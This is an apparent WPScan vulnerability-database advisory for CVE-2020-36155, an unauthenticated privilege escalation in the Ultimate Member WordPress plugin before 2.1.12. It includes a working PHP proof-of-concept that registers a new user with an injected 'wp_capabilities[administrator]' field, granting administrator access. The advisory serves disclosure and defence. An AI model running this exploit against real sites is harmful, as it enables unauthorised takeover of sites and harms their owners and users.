WordPress Plugin Vulnerabilities

Ultimate Member < 2.1.12 - Unauthenticated Privilege Escalation via User Meta

Description

An attacker could supply an array parameter for sensitive meta data such as the wp_capabilities user meta which defines a user’s role. During the registration process, submitted registration details were passed to the update_profile function, and any respective metadata that was submitted, regardless of what was submitted, would be updated for that newly registered user. This simple request would grant administrator access upon registration.

Proof of Concept

<?php

// Settings
$wp_url = $argv[1];
$username = $argv[2];
$name = $argv[3];
$lastname = $argv[4];
$email = $argv[5];
$um_role = $argv[6];

// Pull the Nonce
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/register');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);

preg_match('/_wpnonce"\svalue="([^"]+)"/', $content, $matches);
$nonce = $matches[1];

// Pull the form_id
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/register');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);

preg_match('/id=\"form_id_([^"]+)"/', $content, $matches);
$form_id = $matches[1];

// Update Settings
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/register');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'user_login-' . $form_id => $username,
    'first_name-'. $form_id => $name,
    'last_name-' . $form_id => $lastname,
    'user_email-' . $form_id => $email,
    'user_password-' . $form_id => 'StrongPassword123!',
    'confirm_user_password-' . $form_id => 'StrongPassword123!',
    'wp_capabilities[administrator]' => '',
    'form_id' => $form_id,
    'timestamp' => '1603399250',
    'um_request' => '',
    '_wpnonce' => $nonce,
    '_wp_http_referer' => 'register'

]);

$output = curl_exec($ch);
curl_close($ch);
print_r($output);

?>

Affects Plugins

Plugin icon
ultimate-member
Fixed in 2.1.12

References

CVE
CVE-2020-36155
URL
https://www.wordfence.com/blog/2020/11/critical-privilege-escalation-vulnerabilities-affect-100k-sites-using-ultimate-member-plugin/

Classification

Type
PRIVESC
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-269
CVSS
10.0 (critical)

Miscellaneous

Original Researcher
Chloe Chamberland
Submitter
Chloe Chamberland
Submitter website
https://wordfence.com
Submitter twitter
infosecchloe
Verified
No
WPVDB ID
cf13b0f8-5815-4d27-a276-5eff8985fc0b

Timeline

Publicly Published
2020-11-09 (about 3 years ago)
Added
2020-11-09 (about 3 years ago)
Last Updated
2021-01-06 (about 3 years ago)

Other

Published
Title
Published
2023-08-11
Title
Premium Packages - Sell Digital Products Securely < 5.7.5 - Subscriber+ Privilege Escalation
Published
2020-03-16
Title
LearnPress < 3.2.6.7 - Privilege Escalation
Published
2020-06-11
Title
WordPress < 5.4.2 - Misuse of set-screen-option Leading to Privilege Escalation
Published
2020-05-14
Title
Login/Signup Popup < 1.5 - Authenticated Stored Cross-Site Scripting (XSS)
Published
2019-07-31
Title
ND Shortcodes For Visual Composer < 6.0 - Unauthenticated WP Options Update